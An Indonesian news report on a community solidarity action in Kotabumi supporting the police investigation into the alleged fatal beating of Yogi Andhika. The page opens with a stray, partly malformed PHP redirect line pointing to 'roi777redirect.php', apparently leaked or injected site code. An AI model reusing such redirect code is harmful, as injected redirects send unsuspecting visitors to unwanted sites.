header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); GMPLU Dukung Polres Lampura Mengusut Tuntas Pelaku Penganiayaan Almarhum Yogi -
GMPLU Dukung Polres Lampura Mengusut Tuntas Pelaku Penganiayaan Almarhum Yogi

TRANSLAMPUNG.COM

KOTABUMI – Masyarakat yang tergabung dalam Gerakan Masyarakat Peduli Lampung Utara (GMPLU)  Menggelar aksi solidaritas kemanusiaan terhadap kasus dugaan penganiayaan yang merenggut nyawa Yogi Andhika, Di Bunderan Tugu Payan Mas  Kotabumi, Senin (26/3)

Aksi solidaritas terhadap Almarhum Yogi Andhika tersebut adalah bentuk dukungan kepada Polda Lampung khusus nya Polres Lampung Utara, Dalam dalam mengusut tuntas siapa pelaku dan dalang pembunuhan Almarhum Yogi.

Diketahui,  Terkuaknya kasus ini,  Berawal dari adanya laporan Fitrita Hartati, (56), ibu kandung almarhum Yogi di Mapolres Lampung Utara beberapa waktu lalu yang meminta agar aparat penegak hukum dapat mengusut tuntas kematian anaknya yang dinilai tidak wajar.

Koordinator aksi Sandi Fernanda dan Ikrom dalam orasinya mengulas kembali kronologis kejadian yang diduga kuat menjadi penyebab kematian Yogi Andhika.

“Kematian almarhum Yogi sangatlah tidak wajar. Perlakuan yang diterima almarhum sesaat sebelum kematiannya berupa penganiayaan yang sangat tidak berperikemanusiaan,” ucap Ikrom

Sementara Sandi Fernanda saat dikonfirmasi disela sela aksi mengatakan, jika aksi ini dimaksudkan guna mengawal jalannya proses penyelidikan terhadap kasus dugaan penganiayaan yang masih dalam proses penyelidikan aparat penegak hukum.

“Kami sangat yakin dengan kinerja dan profesionalisme kepolisian dalam mengungkap kasus ini. Ini hanyalah bentuk dukungan moral kami kepada aparat penegak hukum. Juga sebagai wujud kepedulian dan solidaritas kemanusiaan terhadap keluarga almarhum,” ujar Sandi Fernanda

Dari pantauan dilokasi aksi yang dilakukan GMPLU dimulai dengan menyampaikan orasi sebagai bentuk keprihatinan bagaimana proses pengeroyokan yang dialami almarhum Yogi Andhika saat dijemput paksa, Kemudian menyalakan  lilin sebagai simbol cahaya penerang dalam pengungkapan kasus kematian Yogi Andhika, Yang diteruskan dengan shalawat bersama dan long march mengelilingi Bunderan Tugu Payan Mas.

Nampak  Kapolres Lampung Utara AKBP Eka Mulyana,  Kabag Ops, Kompol Handak PQ,  ikut menjaga jalannya aksi solidaritas kemanusiaan yang digelar mulai pukul 16.00 WIB (Eka)

News Reporter